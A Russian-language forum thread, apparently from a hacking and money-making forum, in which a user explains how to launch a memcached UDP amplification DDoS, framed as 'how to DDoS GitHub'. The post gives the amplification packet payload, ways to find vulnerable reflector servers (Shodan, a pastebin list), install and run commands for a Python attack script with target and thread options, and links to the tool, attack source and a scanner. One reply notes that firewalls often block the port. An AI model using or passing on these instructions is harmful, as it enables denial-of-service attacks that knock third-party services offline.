• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Memcached или как заддосить гитхаб

CypherZ

Местный
Сообщения
176
Реакции
182
0 руб.
Telegram
Jabber
Расскажу немного про эту уязвимость и покажу как пользоваться.
Для этого нам понадобится наш любимый Linux. Я юзаю Kali, но вообщем это роли не играет.

Немного предыстории:

Недавно обнаружили новую уязвимость, которая позволяет усиливать атаки. Для того, чтобы совершить атаку достаточно знать ip адреса уязвимых серверов c открытым портом 11211. Таких адресов около 17 тыс. На порт уязвимого сервера отправляется пакет:
Код:
\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n

После обработки пакета сервер отвечает большим пакетом до 1mb. Это позволило совершить атаку в 1,3 ТБ/с. Github не справился с атакой, иностранный провайдер тоже, а ведь чтобы запустить такую атаку нужно всего-то пару минут.

Нусс приступим...

Для начало нам нужно найти сервера, для этого мы воспользуемся Shodan .

ca9bc45dd7c82dc81bd7e.png

Или воспользуемся уже готовым списком, который собрали до нас - https://pastebin.com/raw/eSCHTTVu . Скрипт для атаки написан на python 2.7.
Код:
sudo apt-get install python

Потом устанавливаем нужные библиотеки...

Код:
python -m pip install datetime
python -m pip install scapy

Запускаем программу...

Код:
python namescript.py -T xx.xx.xx.xx -S file.txt -P 100 -Thread 100
T - Цель
S - Файл с уязвимыми серверами
P - Кол-во отправленных пакетов
Thread - Потоки

Ссылка на программу - https://github.com/DefWolf/Memecrashed

А также исходники атаки: https://pastebin.com/nmthYmHu

Полезный сканер для поиска: https://pastebin.com/GZcekqLz
 

rejjin

Кодер
Сообщения
194
Реакции
648
0 руб.
Telegram
Жаль, что у большинства фаервол закрывает порт 11211 для доступа извне
 
Сверху Снизу